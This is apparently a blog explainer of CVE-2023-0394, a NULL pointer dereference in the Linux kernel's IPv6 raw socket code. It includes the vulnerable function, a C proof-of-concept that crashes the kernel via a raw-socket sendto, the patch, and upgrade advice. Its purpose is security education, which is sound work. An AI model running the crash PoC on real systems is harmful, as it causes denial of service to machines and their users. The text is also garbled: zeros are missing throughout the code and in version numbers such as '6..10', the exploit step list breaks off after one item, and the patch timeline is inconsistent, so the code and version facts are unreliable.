CVE-2023-0394 - Critical NULL Pointer Dereference in Linux Kernel's IPv6 Raw Sockets - Explained & Exploited

The Linux kernel is the heart of every Linux-based system. And when a bug is found deep inside, the consequences can be serious: think crashes, privilege escalations, or denial-of-service. One such bug, tracked as CVE-2023-0394, affects the IPv6 networking code—specifically the rawv6_push_pending_frames() function in net/ipv6/raw.c—and can trigger a kernel panic by dereferencing a NULL pointer.

In this long read, we'll break down what CVE-2023-0394 is, how it works, why it matters, and how an attacker could exploit it. We’ll use friendly language, share real code snippets, and provide all the references you need to go deeper.

Quick Summary

- Location: net/ipv6/raw.c (rawv6_push_pending_frames)

Discovered: January 2023

- Patched: Linux Kernel commits

How Does the Vulnerability Work?

IPv6 raw sockets allow programs to manually craft and send IPv6 packets. The rawv6_push_pending_frames function is responsible for taking a buffer of IPv6 data and sending it through the network stack. But—due to a bug—the function can be triggered in a way where it tries to access a structure that is actually NULL. This makes the kernel panic and crashes the whole system.

Here’s what the vulnerable function looked like before the patch (simplified)

// net/ipv6/raw.c

static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6)
{
    struct sk_buff *skb;
    struct ipv6_txoptions *opt;

    //...

    opt = tx6_opt(sk); // Should return ipv6_txoptions or NULL

    //...

    if (opt->hopopt) { // <--- This is the scary line
        // ...do something with opt->hopopt
    }
}

The key problem is that opt can be NULL, but the code doesn’t check before doing opt->hopopt. If opt is NULL, this will dereference a null pointer and crash the kernel.

Where Does opt Come From?

tx6_opt() is a macro that fetches IPv6 transmission options from the socket. If the socket hasn’t been configured with any options, it returns NULL.

To exploit this bug, an attacker can

1. Open a raw IPv6 socket (requires CAP_NET_RAW capability, usually available to root or specific privileged containers).

Here’s a minimal C program that can reproduce the crash

// WARNING: This example will crash your system! For research and lab use only.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

int main() {
    int sockfd = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
    if (sockfd < ) {
        perror("socket");
        exit(1);
    }

    struct sockaddr_in6 dst = {};
    dst.sin6_family = AF_INET6;
    inet_pton(AF_INET6, "::1", &dst.sin6_addr);

    char buffer[40] = {}; // Minimal size
    // No options set - this is key!

    // The following sendto will trigger the bug and crash the system
    if (sendto(sockfd, buffer, sizeof(buffer), , (struct sockaddr*)&dst, sizeof(dst)) < ) {
        perror("sendto");
    }

    close(sockfd);
    return ;
}

Note: Run-only in a secure test environment. Kernel will crash and system will halt.

Who’s Affected?

This bug exists in Linux kernels versions before 6..10 (patch committed in late 2022, see upstream commit). Many major distributions backported the fix, but unpatched custom kernels and embedded devices could be vulnerable.

Developers simply added a NULL check for the opt pointer

if (opt && opt->hopopt) {
    // Safe to use opt->hopopt now
}

With this fix, the kernel won’t crash—even if transmission options are missing.

How To Protect Yourself

- Upgrade your kernel. If you’re running Linux 6..10 or later, you’re safe. For older kernels, check your distribution’s kernel update logs for backported patches.

References

- CVE-2023-0394 at NVD
- Upstream Linux kernel patch
- Red Hat Security Advisory
- Exploit Proof-of-Concept (PoC) Discussion

Conclusion

CVE-2023-0394 shows how a simple missed NULL check in kernel code can bring down the whole system. Raw sockets are a powerful tool, but with great power comes great risk. Make sure your systems are patched, limit who can use raw sockets, and watch for kernel advisories—because sometimes one bad pointer is all it takes for everything to come crashing down.

Stay safe, keep your kernels updated, and if you play with dangerous code, always do it in a test lab!


*Written exclusively for this post. If you have Linux security concerns, patch now!*

Timeline

Published on: 01/26/2023 21:18:00 UTC
Last modified on: 03/03/2023 01:15:00 UTC